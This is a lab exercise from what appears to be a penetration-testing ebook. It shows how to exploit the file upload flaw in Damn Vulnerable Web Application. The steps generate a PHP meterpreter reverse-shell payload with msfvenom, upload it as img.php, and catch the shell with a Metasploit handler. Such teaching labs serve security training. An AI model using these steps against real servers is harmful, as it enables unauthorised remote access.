Search in book...
Toggle Font Controls
Create new playlist

Name your new playlist

Playlist description (optional)
Sign In

Email address

Password

Forgot Password?

or

Continue with Facebook

Continue with Google
Sign Up

Full Name

Email address

Confirm Email Address

Password

or

Continue with Facebook

Continue with Google

Previous Chapter

Exploiting code execution vulnerabilities

Exploiting file upload vulnerabilities

In this exercise, we are going to use our OWASP BWA virtual machine to demonstrate a file upload vulnerability. Let's get started:

First, create a payload on your Kali Linux (attacker) machine using msfvenom, which will later be uploaded to the target server. Using the following syntax, create a PHP-based payload for establishing a reverse connection:

msfvenom -p php/meterpreter/reverse_tcp lhost=<IP address of Kali Linux> lport=4444 -f raw

Copy the highlighted code, open a text editor, and save the file as img.php:

Using your web browser within Kali Linux, enter the IP address of OWASP BWA in the address bar and hit Enter.
On the main page, click on Damn Vulnerable Web Application:

The DVWA login portal will appear. Log in with admin/admin as Username/Password:

Once logged in, you'll see a menu on the left-hand side. Click on Upload to view the Vulnerability: File Upload page:

Click on Browse..., select the img.php file, and then click Upload on the page.

Once the file has been uploaded, you will receive a message displaying the directory where the file is stored on the server:

Copy the file location, that is, hackable/uploads/img.php, and paste it into the URL to execute the payload (img.php). The following is the expected URL:

192.168.56.101/DVWA/ hackable/uploads/img.php

Hit Enter to execute the payload.

On Kali Linux, load Metasploit using the following commands:

service postgresql start
msfconsole

Enable the multi/handler module in Metasploit, set the reverse TCP payload, and execute the exploit using the following commands:

Please be sure to check the IP address of the Kali Linux machine and adjust the LHOST parameter accordingly.

Having executed the img.php payload on the server and enabled the multi/handler on Metasploit, we are able to receive a reverse shell on our attacker machine, as shown in the following screenshot:

Using the meterpreter shell, you are now able to perform further actions on the compromised system.

In the following section, we will demonstrate how to exploit code execution vulnerabilities.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.

3.129.211.87